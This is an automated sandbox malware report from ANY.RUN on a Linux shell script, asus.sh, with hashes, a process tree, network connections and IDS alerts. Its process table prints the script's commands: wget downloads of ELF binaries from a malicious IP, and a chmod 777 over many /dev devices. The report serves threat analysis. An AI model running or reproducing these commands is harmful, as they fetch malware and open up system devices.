File name:

asus.sh

Full analysis: https://app.any.run/tasks/66866644-47dc-4464-8182-292d371eff2c
Verdict: Malicious activity
Analysis date: June 19, 2025, 06:14:49
OS: Ubuntu 22.04.2
Tags:
auto
generic
MIME: text/plain
File info: ASCII text
MD5:

51040DED77ED8881EBCE7E2E9C31FE1A

SHA1:

BB73D5306F6F0A6ED7B891A49353CA157BC5762B

SHA256:

A09C12EB2A57BFE5326BFE0C36ED3CD2E5D4B41735F31407D87D3703CB20EC83

SSDEEP:

12:BFS64iSFSl6qheSFS0EU64iDl6qheD0ET:zSq2SFe2S0ZqDFeD0a

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GENERIC has been found (auto)

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)

  • SUSPICIOUS

    • Uses wget to download content

      • bash (PID: 41401)

    • Modifies file or directory owner

      • sudo (PID: 41396)

    • Executes commands using command-line interpreter

      • sudo (PID: 41399)
      • bash (PID: 41401)

    • Potential Corporate Privacy Violation

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41403)
      • wget (PID: 41435)
      • wget (PID: 41412)
      • wget (PID: 41408)

    • Connects to the server without a host name

      • wget (PID: 41430)
      • wget (PID: 41412)
      • wget (PID: 41416)
      • wget (PID: 41408)
      • wget (PID: 41435)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41401)

  • INFO

    • Checks timezone

      • wget (PID: 41403)
      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)
      • wget (PID: 41408)
      • wget (PID: 41412)

    • Creates file in the temporary folder

      • wget (PID: 41416)
      • wget (PID: 41430)
      • wget (PID: 41435)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
170
Monitored processes
39
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs #GENERIC wget systemctl no specs systemctl no specs systemctl no specs systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs bash no specs rm no specs cron no specs dash no specs run-parts no specs

Process information

PID
CMD
Path
Indicators
Parent process
41395/bin/sh -c "sudo chown user /home/user/Desktop/asus\.sh && chmod +x /home/user/Desktop/asus\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/asus\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41396sudo chown user /home/user/Desktop/asus.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41397chown user /home/user/Desktop/asus.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41398chmod +x /home/user/Desktop/asus.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41399sudo -iu user /home/user/Desktop/asus.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41401-bash --login -c \/home\/user\/Desktop\/asus\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41402/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41403wget http://45.125.66.79/j/mle1/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
768
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41405chmod 777 autofs block bsg btrfs-control bus char console core cpu cpu_dma_latency cuse disk dma_heap dri ecryptfs fb0 fd full fuse hidraw0 hpet hugepages hwrng i2c-0 initctl input kmsg log loop0 loop1 loop10 loop11 loop12 loop13 loop14 loop15 loop16 loop17 loop18 loop19 loop2 loop3 loop4 loop5 loop6 loop7 loop8 loop9 loop-control mapper mcelog mem mqueue net null nvram port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sg0 shm snapshot snd stderr stdin stdout tty tty0 tty1 tty10 tty11 tty12 tty13 tty14 tty15 tty16 tty17 tty18 tty19 tty2 tty20 tty21 tty22 tty23 tty24 tty25 tty26 tty27 tty28 tty29 tty3 tty30 tty31 tty32 tty33 tty34 tty35 tty36 tty37 tty38 tty39 tty4 tty40 tty41 tty42 tty43 tty44 tty45 tty46 tty47 tty48 tty49 tty5 tty50 tty51 tty52 tty53 tty54 tty55 tty56 tty57 tty58 tty59 tty6 tty60 tty61 tty62 tty63 tty7 tty8 tty9 ttyprintk ttyS0 ttyS1 ttyS10 ttyS11 ttyS12 ttyS13 ttyS14 ttyS15 ttyS16 ttyS17 ttyS18 ttyS19 ttyS2 ttyS20 ttyS21 ttyS22 ttyS23 ttyS24 ttyS25 ttyS26 ttyS27 ttyS28 ttyS29 ttyS3 ttyS30 ttyS31 ttyS4 ttyS5 ttyS6 ttyS7 ttyS8 ttyS9 udmabuf uhid uinput urandom userfaultfd userio vcs vcs1 vcs2 vcs3 vcs4 vcs5 vcs6 vcsa vcsa1 vcsa2 vcsa3 vcsa4 vcsa5 vcsa6 vcsu vcsu1 vcsu2 vcsu3 vcsu4 vcsu5 vcsu6 vfio vga_arbiter vhci vhost-net vhost-vsock zero zfs/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41406-bash --login -c \/home\/user\/Desktop\/asus\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32512
Executable files
0
Suspicious files
0
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
41416wget/tmp/mle1o
MD5:
SHA256:
41430wget/tmp/mbe1 (deleted)o
MD5:
SHA256:
41435wget/tmp/a5le1o
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
29
TCP/UDP connections
17
DNS requests
13
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
169.150.255.184:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
200
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
POST
200
185.125.188.54:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
GET
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
GET
200
169.150.255.181:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
169.150.255.181:443
odrs.gnome.org
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41403
wget
45.125.66.79:80
Tele Asia Limited
LT
malicious
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41408
wget
45.125.66.79:80
Tele Asia Limited
LT
malicious
41412
wget
45.125.66.79:80
Tele Asia Limited
LT
malicious
41416
wget
45.125.66.79:80
Tele Asia Limited
LT
malicious
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::198
  • 2620:2d:4002:1::197
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 185.125.190.96
  • 185.125.190.97
  • 185.125.190.98
  • 91.189.91.48
  • 91.189.91.98
  • 185.125.190.49
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.18
  • 185.125.190.48
whitelisted
odrs.gnome.org
  • 169.150.255.181
  • 37.19.194.80
  • 195.181.175.40
  • 169.150.255.183
  • 207.211.211.27
  • 212.102.56.179
  • 195.181.170.19
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::107
whitelisted
google.com
  • 142.250.185.174
  • 2a00:1450:4001:811::200e
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.58
  • 185.125.188.59
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
whitelisted
13.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41403
wget
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 5
41416
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41430
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41435
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41403
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41408
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41412
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
asus.sh